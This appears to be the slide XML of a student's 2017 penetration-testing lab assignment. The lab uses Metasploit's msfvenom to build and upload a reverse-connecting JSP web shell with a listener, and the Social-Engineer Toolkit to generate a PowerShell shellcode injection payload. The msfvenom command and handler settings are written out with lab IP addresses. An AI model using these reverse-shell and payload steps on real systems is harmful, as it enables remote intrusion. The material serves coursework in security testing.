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417" y="-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352281" y="2039400"/>
            <a:ext cx="5941454" cy="45976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Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270716" y="1122574"/>
            <a:ext cx="9195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Step 1 - Generating a reverse-connecting jsp shell to set up payload listener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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9137261" y="-66958"/>
            <a:ext cx="5248418" cy="642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Mauchel Barthelemy – MIS 5212 | Spring 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab Assignment 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetration Test: Metasploit | SET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70715" y="478369"/>
            <a:ext cx="7336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w Cen MT (Body)"/>
              </a:rPr>
              <a:t>PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632619" y="3475253"/>
            <a:ext cx="6096000" cy="9682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msfvenom -a x86 --platform windows -p java/jsp_shell_reverse_tcp LHOST=192.168.253.135 LPORT=8080 -f raw</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3186117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6219" y="1381154"/>
            <a:ext cx="9195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Step 2 - Upload shell to the remote web server that supports jsp files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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565865" y="1663279"/>
            <a:ext cx="5886450" cy="2400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Text Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766219" y="4422840"/>
            <a:ext cx="10689465" cy="28591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My exploit failed due to strong Internet Security protection (Antivirus) from victim’s machine.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Otherwise, I would enter code lines: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a. hostname  b. ipconfig. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Metasploit would continue with a command line saying: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[*] Command shell session 1 opened (192.168.253.135:8080 -&gt; 192.168. 253.135:3914) at Sat Feb 20:30:00 -0500 2017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Then, reveal computer system upon opening paylod file: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Ethernet adapter Local Area Connection 3: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Connection-specific DNS Suffix . : localdomain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IP Address. . . . . . . . . . . . : 192.168.253.135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Subnet Mask .  . . . . . . . . . : 255.255.255.0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Default Gateway . . . . . . . . . : 192.168.1.1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05945" y="2246028"/>
            <a:ext cx="6096000" cy="15741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exploit/multi/handler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PAYLOAD java/jsp_shell_reverse_tcp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LHOST 192.168.1.101LHOST =&gt; 192.168.1.101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LPORT 8080LPORT =&gt; 8080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exploit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6219" y="547594"/>
            <a:ext cx="7336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w Cen MT (Body)"/>
              </a:rPr>
              <a:t>PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9137261" y="-66958"/>
            <a:ext cx="5248418" cy="642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Mauchel Barthelemy – MIS 5212 | Spring 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab Assignment 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetration Test: Metasploit | SET </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2845255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3037" y="776888"/>
            <a:ext cx="9195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Step 1 – Select attack method from menu  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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953037" y="156330"/>
            <a:ext cx="52484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w Cen MT (Body)"/>
              </a:rPr>
              <a:t>PART 2 – PAYLOAD ATTACK: SET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298504" y="1607496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953037" y="1236563"/>
            <a:ext cx="4871043" cy="24897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953036" y="3863662"/>
            <a:ext cx="4871043" cy="2695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868238" y="2380434"/>
            <a:ext cx="548210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(for 1) Social-Engineering Attacks)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24079" y="4883103"/>
            <a:ext cx="6096000" cy="3886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(for 9) Powershell Attacks Vector)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37261" y="-66958"/>
            <a:ext cx="5248418" cy="642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Mauchel Barthelemy – MIS 5212 | Spring 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab Assignment 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetration Test: Metasploit | SET </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="471109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9874" y="827035"/>
            <a:ext cx="9195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Step 2 – Create packet file to load file to victim machine  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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29874" y="156330"/>
            <a:ext cx="52484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w Cen MT (Body)"/>
              </a:rPr>
              <a:t>PART 2 – PAYLOAD ATTACK: SET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6779913" y="2050496"/>
            <a:ext cx="5412087" cy="364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(for 1) Powershell Alphanumeric Shellcode Injector)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ifconfig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(to load IP information)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192.168.253.132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443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Copy/past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/root/.set/reports/powershell/ and past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new terminal after cd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 x86_powershell_injection.txt ~/Desktop/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953037" y="1817196"/>
            <a:ext cx="6490952" cy="45929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Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276304" y="5692462"/>
            <a:ext cx="5263166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Metasploit is listening for the packet coming from victim’s machine once the attempt to open the payload file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6413679" y="4395989"/>
            <a:ext cx="403538" cy="652529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37261" y="-66958"/>
            <a:ext cx="5248418" cy="642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Mauchel Barthelemy – MIS 5212 | Spring 2017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab Assignment 1  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetration Test: Metasploit | SET </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7133510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213</TotalTime>
  <Words>415</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>47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Times New Roman</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Tw Cen MT (Body)</vt:lpstr>
      <vt:lpstr>Circuit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Mau_Barth</dc:creator>
  <cp:lastModifiedBy>Mau_Barth</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-19T23:51:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-22T01:34:16Z</dcterms:modified>
</cp:coreProperties>
</file>